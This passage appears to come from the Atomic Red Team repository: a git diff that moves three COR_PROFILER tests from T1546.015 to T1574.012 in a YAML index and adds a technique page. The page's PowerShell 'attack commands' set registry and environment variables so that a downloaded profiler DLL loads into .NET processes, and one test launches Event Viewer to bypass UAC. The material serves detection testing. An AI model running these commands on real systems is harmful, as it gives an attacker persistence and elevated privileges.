- supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating system environment variables" -ForegroundColor Cyan - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - cleanup_command: | - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null - name: powershell - elevation_required: true - - name: COM Hijack Leveraging registry-free process scope COR_PROFILER - auto_generated_guid: 
79d57242-bbef-41db-b301-9d01d9f6e817 - description: 'Creates process scope environment variables to enable a .NET profiler - (COR_PROFILER) without making changes to the registry. The unmanaged profiler - DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell. - -' - supported_platforms: - - windows - input_arguments: - file_name: - description: unamanged profiler DLL - type: Path - default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" - executor: - command: | - $env:COR_ENABLE_PROFILING = 1 - $env:COR_PROFILER = '#{clsid_guid}' - $env:COR_PROFILER_PATH = '#{file_name}' - POWERSHELL -c 'Start-Sleep 1' - cleanup_command: | - $env:COR_ENABLE_PROFILING = 0 - $env:COR_PROFILER = '' - $env:COR_PROFILER_PATH = '' - name: powershell + atomic_tests: [] T1134.002: technique: external_references: 
@@ -9890,7 +9893,132 @@ persistence: - Jesse Brown, Red Canary x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + 
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell + - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free 
process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell T1546.001: technique: created: '2020-01-24T13:40:47.282Z' 
@@ -10248,129 +10376,7 @@ persistence: - Elastic x_mitre_platforms: - Windows - identifier: T1546.015 - atomic_tests: - - name: COM Hijack Leveraging user scope COR_PROFILER - auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - description: | - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). - The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. - Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. - If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, - the notepad process will not execute with high integrity. - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan - New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value 
"#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - Write-Host "executing eventvwr.msc" -ForegroundColor Cyan - START MMC.EXE EVENTVWR.MSC - cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" - -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment - -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty - -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore - | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" - -Force -ErrorAction Ignore | Out-Null\n" - name: powershell - - name: COM Hijack Leveraging System Scope COR_PROFILER - auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - description: | - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. - The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity - level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will - still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
- supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating system environment variables" -ForegroundColor Cyan - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - cleanup_command: | - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null - name: powershell - elevation_required: true - - name: COM Hijack Leveraging registry-free process scope COR_PROFILER - auto_generated_guid: 
79d57242-bbef-41db-b301-9d01d9f6e817 - description: 'Creates process scope environment variables to enable a .NET profiler - (COR_PROFILER) without making changes to the registry. The unmanaged profiler - DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell. - -' - supported_platforms: - - windows - input_arguments: - file_name: - description: unamanged profiler DLL - type: Path - default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" - executor: - command: | - $env:COR_ENABLE_PROFILING = 1 - $env:COR_PROFILER = '#{clsid_guid}' - $env:COR_PROFILER_PATH = '#{file_name}' - POWERSHELL -c 'Start-Sleep 1' - cleanup_command: | - $env:COR_ENABLE_PROFILING = 0 - $env:COR_PROFILER = '' - $env:COR_PROFILER_PATH = '' - name: powershell + atomic_tests: [] T1554: technique: id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5 
@@ -22038,7 +22044,132 @@ defense-evasion: - Jesse Brown, Red Canary x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + 
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell + - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free 
process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell T1070.003: technique: external_references: diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md new file mode 100644 index 00000000..d04da030 --- /dev/null +++ b/atomics/T1574.012/T1574.012.md @@ -0,0 +1,190 @@ +# T1574.012 - COR_PROFILER +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.012) +
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013) + +The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) + +Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ +## Atomic Tests + +- [Atomic Test #1 - User scope COR_PROFILER](#atomic-test-1---user-scope-cor_profiler) + +- [Atomic Test #2 - System Scope COR_PROFILER](#atomic-test-2---system-scope-cor_profiler) + +- [Atomic Test #3 - Registry-free process scope COR_PROFILER](#atomic-test-3---registry-free-process-scope-cor_profiler) + + +
+ +## Atomic Test #1 - User scope COR_PROFILER +Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). +The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. +Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. +If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, +the notepad process will not execute with high integrity. + +Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| +| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan +New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null +New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null +New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null +New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null +Write-Host "executing eventvwr.msc" -ForegroundColor Cyan +START MMC.EXE EVENTVWR.MSC +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore +Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null +Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null +Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: #{file_name} must be present +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" +``` + + + + +
+
+ +## Atomic Test #2 - System Scope COR_PROFILER +Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. +The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity +level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will +still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. + +Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll| +| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) + + +```powershell +Write-Host "Creating system environment variables" -ForegroundColor Cyan +New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null +New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null +New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null +``` + +#### Cleanup Commands: +```powershell +Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null +Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null +Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: #{file_name} must be present +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" +``` + + + + +
+
